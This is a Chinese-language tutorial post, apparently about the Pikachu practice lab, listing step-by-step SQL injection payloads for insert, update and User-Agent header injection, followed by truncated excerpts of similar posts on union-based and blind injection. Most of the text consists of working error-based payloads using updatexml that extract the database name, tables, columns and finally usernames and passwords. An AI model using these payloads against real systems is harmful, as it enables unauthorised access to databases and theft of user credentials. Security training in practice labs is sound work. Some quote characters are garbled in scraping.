SQL注入之常見注入的步驟

2021-10-10 10:20:25 字數 1710 閱讀 8750

update注入 (在修改資訊的時候,後台就是通過update去找操作的)

insert注入(insert 注入是指我們前端註冊的資訊,後台就是通過

insert這個操作插入到資料庫中)

①在註冊資訊處抓包

②insert判斷注入:單引號報錯 存在注入,報錯資訊為』1234』),'1』1』1』1)

③基於報錯資訊進行注入,構造payload

爆資料庫:1234』 or updatexml(1,concat(0x7e,(select database()),0x7e),1)or』

④爆資料表:1234』 or updatexml(1,concat(0x7e(select table_name from information_schema.tables where table_schema=『pikachu』),0x7e),1)or』

⑤爆資料列:1234』 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1)or』

⑥爆使用者名稱密碼:1234』 or updatexml(1,concat(0x7e,(select concat (username,0x7e,password)from users limit 0,1),0x7e),1)or』

①判斷注入:單引號報錯存在注入

②爆資料庫:56 or updatexml(1,concat(0x7e,(select database()),0x7e),1)

③爆資料表:56 or updatexml(1,concat(0x7e,(select table_name information_schema.tables where table_schema=『pikachu』 limit 0,1),0x7e),1)or』

④爆資料列:56 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1)

⑤爆使用者名稱密碼字段:56 or updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1)

①判斷注入:登入後抓包修改user-agent為單引號報錯

②爆資料庫:'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 』

③報資料表:』 or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=『pikachu』 limit 0,1),0x7e),1) or 』

④爆資料列:』 or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『users』 limit 0,1),0x7e),1) or』

⑤爆使用者名稱密碼字段:1234』 or updatexml(1,concat(0x7e,(select concat(username,0x7e,password)from users limit 0,1),0x7e),1) or』

SQL注入之常見注入的步驟

第一步 抓包 第二步 判斷注入 id 1 and 1 1 正確 id 1 and1 2 報錯 第三步 判斷列數 id 1 order by 3 報錯 order by 2 正確 依此可以判斷為2列 第四步 爆顯示位 id 1 union select 1,2 可以爆出1或哪個是顯示位 第五步 爆資料...

SQL注入之常見注入的步驟

判斷注入 name kobe and 1 1 23 正常,name kobe and 1 2 報錯 存在注入 通過length判斷資料庫的長度 name kobe and length database 6 23 正常,7報錯 所以長度為7 判斷資料庫第一位的ascii值 name kobe and...

SQL注入基本步驟

這篇文章將的比較好 sql注入基本步驟 1 注入點測試 2 查詢字段數 3 判斷回顯位 4 查詢資料庫的基本資訊 5 爆資料庫名 6 爆資料庫表名 7 爆欄位名 現在來介紹幾個在滲透測試中常用的幾個函式和表庫名。hostname 主機名稱 datadir 返回資料庫的儲存目錄 version com...